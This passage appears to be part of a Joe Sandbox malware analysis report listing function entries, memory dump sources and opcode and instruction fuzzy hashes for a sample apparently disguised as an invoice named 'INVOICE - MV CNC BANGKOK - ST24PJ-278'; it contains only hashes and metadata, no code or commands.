                                            • Opcode ID: 84a1c19d1db0a1fde9093ac9fadd5087b3a1213e447060e44ea36e23528a6ecc
                                            • Instruction ID: 4d0983d06a5071444cb7f6c68d90d83ffb3e7a4c66de383c5baff992756b28d9
                                            • Opcode Fuzzy Hash: 84a1c19d1db0a1fde9093ac9fadd5087b3a1213e447060e44ea36e23528a6ecc
                                            • Instruction Fuzzy Hash: 1D01263170A645EFE326A2AED898FAB7BDDEF45394F4500B4F9818B250DA25DC00C2B1
                                            Function 01084690 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 127df3babb36754cb4d6dd2153f6aac4cf7ee9401bca23136c1b4ae62d28f004
                                            • Instruction ID: d1f99efb015c2aa082b1fd260c3bbd6624a43fb67224b97a102af20b601ab08e
                                            • Opcode Fuzzy Hash: 127df3babb36754cb4d6dd2153f6aac4cf7ee9401bca23136c1b4ae62d28f004
                                            • Instruction Fuzzy Hash: 0F11C236208656AFDB25EF59D840F567BE4FB85764F004169F9D4CB250C370E840CF60
                                            Function 01154B00 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d363fd253347d9a84f12bba60c33d354ed66e665f73a4996872b7faae41da148
                                            • Instruction ID: 3ee293394b363a511bec84278f7f29faca12c6c523d2e9139405dfd7fee7ce51
                                            • Opcode Fuzzy Hash: d363fd253347d9a84f12bba60c33d354ed66e665f73a4996872b7faae41da148
                                            • Instruction Fuzzy Hash: 6E110632200601DFD769DA6DD840F57B7A6FFC4710F154429EEA287A50EB30A842CB90
                                            Function 010B6620 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6302a05095febdaff1af7d8ad338454816e10cc8638c4d3c6a1c3f5419368f13
                                            • Instruction ID: 13687771214e4f7695c9c846b07097fd2d0470f62f0aa35defa5e27b4497f26b
                                            • Opcode Fuzzy Hash: 6302a05095febdaff1af7d8ad338454816e10cc8638c4d3c6a1c3f5419368f13
                                            • Instruction Fuzzy Hash: 55118272A00615ABDB21EF69C9C0B9EFBF8EF88750F540465DA85B7240D731AD018B50
                                            Function 010AEA2E Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a2a3c1661d9795add31a13c6446ef26e6658aea432bbd32212cbfe551e05266
                                            • Instruction ID: 2297c46f34b06af238c181c5814616b04bf68bb1897c219e432dd8dc1e60b567
                                            • Opcode Fuzzy Hash: 4a2a3c1661d9795add31a13c6446ef26e6658aea432bbd32212cbfe551e05266
                                            • Instruction Fuzzy Hash: D501DE7160010A9FC769DB18D408F5ABBFAEB95324F2081BAE1488B361C770EC82CB90
                                            Function 0040E49A Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0792dfa32ea11012f1b3f9e271fba6f07115285743e56cdaf965cbd6e0a3a08d
                                            • Instruction ID: 095973abb5103c2852dd1c42b95a2ad6398e9946aa1580cdbcbe775aafba4977
                                            • Opcode Fuzzy Hash: 0792dfa32ea11012f1b3f9e271fba6f07115285743e56cdaf965cbd6e0a3a08d
                                            • Instruction Fuzzy Hash: B711047A6007005BC319DE5ADC81DD6F3A4EB89324F00496EF75DAB181D235A528CBE8
                                            Function 010AE53E Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                            • Instruction ID: 015d1a03b71964a00da11217bae41f38fdd8a7b3dddbdd57ea293679d5e78d4e
                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                            • Instruction Fuzzy Hash: D911A5723026C39FEB63977DE968B697BD4AB41754F1D00E0DEC18B652F728C842D650
                                            Function 0110E75D Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                            • Instruction ID: 4f38cbf9cca40d0e45329c9ea6f20b9141aae2242a0ae4b145f9d13a526e2a4d
                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                            • Instruction Fuzzy Hash: FA01FE32A05509AFE72B6F5ACC00F567BA9FF44754F058828E9459B1A0D7B1DD40C7D0
                                            Function 0107A250 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                            • Instruction ID: 6b11736d27a97694b13b5029f0bc0afbfdfb4a0d249ec4ee99997bd412ebb72d
                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                            • Instruction Fuzzy Hash: 56010471A05721DBCB618F1D9840A7E7BE4EB55B70708896DF8D58B281D331D802CB74
                                            Function 01154940 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6835f2529a4c34c0467de41985fcd98d6d7a4637d9501a97852867020dbf5f70
                                            • Instruction ID: d327e00aa165beecafd6c0a8bc52a43b7793f5e3bd72dbed3ed753e06ac408a4
                                            • Opcode Fuzzy Hash: 6835f2529a4c34c0467de41985fcd98d6d7a4637d9501a97852867020dbf5f70
                                            • Instruction Fuzzy Hash: B3010472441501DBC76ADF1C8801E52B7B8EB99370B154225EDB89B596F730D881CBC0
                                            Function 010FE1D0 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7896f104859713cd3b7652b90a9fdf44c392a438cd1a04c999f294c1e1c72182
                                            • Instruction ID: 47e41d4cf1c910a42447863aab19846b95f73e71eae076778efe46a8a2c3265d
                                            • Opcode Fuzzy Hash: 7896f104859713cd3b7652b90a9fdf44c392a438cd1a04c999f294c1e1c72182
                                            • Instruction Fuzzy Hash: 1811E135241641EFDB15EF19CC81F4A7BB8FF54B44F2000A8FA459B661C331ED00CA90
                                            Function 01086259 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b269e202d3758574c6d84d794a81783832a8ca9551c8acae8dc9149e2c486af
                                            • Instruction ID: fe409d147eb3e237626b57a370f8f05d4cd8e897dda0b125bd0c2163d26355ae
                                            • Opcode Fuzzy Hash: 4b269e202d3758574c6d84d794a81783832a8ca9551c8acae8dc9149e2c486af
                                            • Instruction Fuzzy Hash: A311A070505229ABEB65EB64CC42FEC73B4BF04710F5041D8B398A60E0DB709E81CF84
                                            Function 01106050 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab1e3ed3b0d151832645c6868c1f196d39b2623df077d632e4ac6154e4b02672
                                            • Instruction ID: 00200a70fae21256590b59542529b2dcdf276d720718f179b9fc9fd87843dfab
                                            • Opcode Fuzzy Hash: ab1e3ed3b0d151832645c6868c1f196d39b2623df077d632e4ac6154e4b02672
                                            • Instruction Fuzzy Hash: 6F11177290011DABCB16DB94CC80DEFBB7CEF48354F044166A906A7211EA34AA55CBA0
                                            Function 0108208A Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction ID: b0d637c97cbf00e3deab650177bf6cf2b9c9f39116d9d68513d9a524c469e86c
                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction Fuzzy Hash: 110124326042118BEF55AA6DD880B9677A7BFC4700F5981E5FDC28F247EA71CC82CB90
                                            Function 01116500 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b489b767a0c81945ea88ea5919caaddf485454712ca200fd5cc2a5da9486760d
                                            • Instruction ID: 4018816d56bffc1f65a2fd1ed4f319eeee152f61f6beb1d2dd8608ed7faf9b51
                                            • Opcode Fuzzy Hash: b489b767a0c81945ea88ea5919caaddf485454712ca200fd5cc2a5da9486760d
                                            • Instruction Fuzzy Hash: F61104326001469FD709CF19D800BA6FBB9FB5A344F098169E848CB319D772EC80CBA0
                                            Function 0110C810 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: beaad6be677bd51a4385fad195eb02c4806f9f2e73c57670a44029a8c366497f
                                            • Instruction ID: 84ca0049c96b1e13882dd17f92dc5b6edcf55c300622b072820f90f3f68eba86
                                            • Opcode Fuzzy Hash: beaad6be677bd51a4385fad195eb02c4806f9f2e73c57670a44029a8c366497f
                                            • Instruction Fuzzy Hash: 1D111CB1E002099BCB04DFA9D591A9EB7F4FF58250F10806AB905E7351D674EA018FA4
                                            Function 0112EA60 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec995844332de9275423ed45e571ca9ddb738dd7f95afa5f2286399b1a2e16cd
                                            • Instruction ID: 59e9649fc7a855e91296459646f93310fd29fda5f6d6503ebaafc95843a4e097
                                            • Opcode Fuzzy Hash: ec995844332de9275423ed45e571ca9ddb738dd7f95afa5f2286399b1a2e16cd
                                            • Instruction Fuzzy Hash: D001F731142221AFCB3EAF2AC450D7ABBB9FF52660B05842EE1955B211CB31DC51DB91
                                            Function 0107C020 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction ID: a42ee0932199e5398d889ddd9975a02a75d7ece1851de9786b9689801e0bc59c
                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction Fuzzy Hash: 2A0128321007069FEB63A6ADD900EA777E9FFC5210F444459FAD68B980EA70E501CB90
                                            Function 010C20F0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94d056806a92815206b080e019c7ad448e9a7ca23d0c99a1a24be238f46a6127
                                            • Instruction ID: 72e096b61bd5fbc52ccdb8d9f62da3128f766824969ceded8f4fddd930baab6d
                                            • Opcode Fuzzy Hash: 94d056806a92815206b080e019c7ad448e9a7ca23d0c99a1a24be238f46a6127
                                            • Instruction Fuzzy Hash: F4116D35A0120DEBDB05EF64C851BAE7BB5FB94740F00409DEE559B290D735AE11CF90
                                            Function 010BE5CF Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 520248560ba1c0a72ae4bfe7faf80638bf3b604b4446e9f962f17619c9ecf955
                                            • Instruction ID: f71df7f5161de4c34f63919c86aac40d663a54b75b4aee66d0f4639287748acd
                                            • Opcode Fuzzy Hash: 520248560ba1c0a72ae4bfe7faf80638bf3b604b4446e9f962f17619c9ecf955
                                            • Instruction Fuzzy Hash: D501F7B1201A457FD711BB79CD80E97B7BCFF546647000529B24983651DB34EC11CAE0
                                            Function 011169C0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b930850c2080a49dd054345a9ed2dad0a097ccd755b4487eddedfff1e2efec87
                                            • Instruction ID: 0ee72dc1761bb8a1fd687f8129380631f6432978e8387d258667fa4cc0472630
                                            • Opcode Fuzzy Hash: b930850c2080a49dd054345a9ed2dad0a097ccd755b4487eddedfff1e2efec87
                                            • Instruction Fuzzy Hash: 18014033214612DBC328DF79D8849A7FBA8FF44660F11413DE95487190D7319901C7D1
                                            Function 0110C460 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c69cb142c26c349ec7affacfb8f3d2b42de7025548617a178cdb0ed5a2d0a6ca
                                            • Instruction ID: e478aef06545024f7d0d8e5cecb5b27891fc53d4d8b303eeb4c3452ea1c665d5
                                            • Opcode Fuzzy Hash: c69cb142c26c349ec7affacfb8f3d2b42de7025548617a178cdb0ed5a2d0a6ca
                                            • Instruction Fuzzy Hash: 05115771A0120DABDB1AEFA8C854EEE7BB5FB88640F004199BD4197390DB74EA51CF90
                                            Function 0110C97C Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d565fae59eaea6e42a3dbde247424de8bd12005d3edc8eabfd2bb72004aebfa8
                                            • Instruction ID: 52c0fbcdf6e823fae4316a9cdea2b3025cc087c2e12d641af8b6eba507590082
                                            • Opcode Fuzzy Hash: d565fae59eaea6e42a3dbde247424de8bd12005d3edc8eabfd2bb72004aebfa8
                                            • Instruction Fuzzy Hash: C01157B1A183089FC704DF69D441A9BBBE4AF98710F00855EB998DB3A0E630E900CF92
                                            Function 0110CA11 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31c27950655dde101cf31342ae099fcb57083ad0b013dbc687ef043709d93802
                                            • Instruction ID: 2bfc7e1952771a422166d1db5d27fef68dedeef72e44934164a4adf37392fbdd
                                            • Opcode Fuzzy Hash: 31c27950655dde101cf31342ae099fcb57083ad0b013dbc687ef043709d93802
                                            • Instruction Fuzzy Hash: BE117C716183089FC704DF69D841A8BBBF4FF99750F00865EB998D73A0E670E940CB92
                                            Function 01154A80 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction ID: 131fccae121843d29a0897bcab555e28d11d571b2ccd7ffd3fa116baa52304c1
                                            • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction Fuzzy Hash: 2B01D836200605EFD7A99A6DD844F97B7E6FBC5210F044419EA638BA90EB70F880C794
                                            Function 0109E016 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction ID: a291fe2e204c7b9db9e05328a10d37d0dac9e75a4fcb901e6caed2504230b0b9
                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction Fuzzy Hash: 5401BC32200680DFE726C61CC918F3A7BD8EB84784F0940A1FA85CB6A1EA68DC80C621
                                            Function 0107826B Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 189b40d7e0fb4a1ac82531db4cddce9c42a15eff77a0eb321f72bd5d8a42e765
                                            • Instruction ID: 84346bd1882b15d66391bca60d027e43733a7def07aeaf5b5215afba4d27236c
                                            • Opcode Fuzzy Hash: 189b40d7e0fb4a1ac82531db4cddce9c42a15eff77a0eb321f72bd5d8a42e765
                                            • Instruction Fuzzy Hash: D801D431E04605ABC718EB69DC489AE7BF9FF80220B15806A9941AB384EE60D902C695
                                            Function 0112EB50 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7125a4e4db29cfe6fa168de1365f875b92537222548618b310d4c46b2d002ddd
                                            • Instruction ID: a2d9c570cf3f1ae8a90d68696e3fb95142743e98dd50ec652096737b34bca3f9
                                            • Opcode Fuzzy Hash: 7125a4e4db29cfe6fa168de1365f875b92537222548618b310d4c46b2d002ddd
                                            • Instruction Fuzzy Hash: F501F271241B11AFD3395B5AD901F46BAB8EF54B50F01442EF2569F390C7B09891DB54
                                            Function 01082582 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46108e6b12fb7be77221fd3bf33148783e250ed6be7afefdf763c6d81fd608e1
                                            • Instruction ID: 004d19c428b628dc47cd4c92079febe3304a5202eec1b37404927c7297f06d69
                                            • Opcode Fuzzy Hash: 46108e6b12fb7be77221fd3bf33148783e250ed6be7afefdf763c6d81fd608e1
                                            • Instruction Fuzzy Hash: F6F0F932645B15B7C731AB568C40F477AA9EBC4B90F004029B68597600C630DD01DBB0
                                            Function 010AC073 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction ID: 801b00fde2f660e3f0a49352f34734a026595b53bf07e4411ae7e45eb7643931
                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction Fuzzy Hash: CFF0C2B2600A11ABE324CF8EDD40E57FBEADBD5B80F058169B585C7220EA31DD04CB90
                                            Function 0107C310 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction ID: 50ed885166b5ca4bd4a8d86a84777e261c12b3ff25c683f68b4dd79a313118f4
                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction Fuzzy Hash: 62F02173A04A339BF73216BD5940B7FABD58FD1B64F198035F6899B200CA648D0157D8
                                            Function 0115634F Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7630fedbddfe80293bc86d9857074506ee42986de1685953296055170b08749
                                            • Instruction ID: 3c391c4c60de4de4cc5259b8a36ad179493eb630e1ae94f9302a34253f436832
                                            • Opcode Fuzzy Hash: e7630fedbddfe80293bc86d9857074506ee42986de1685953296055170b08749
                                            • Instruction Fuzzy Hash: E6015A71A10209EBCB04DFA9E450AEEB7B8FF58700F10402AA914EB350D774AA008BA0
                                            Function 0115625D Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e789951a598df2607e063da60b19f5ff5da379e3f472aaede306b23a6daf21e
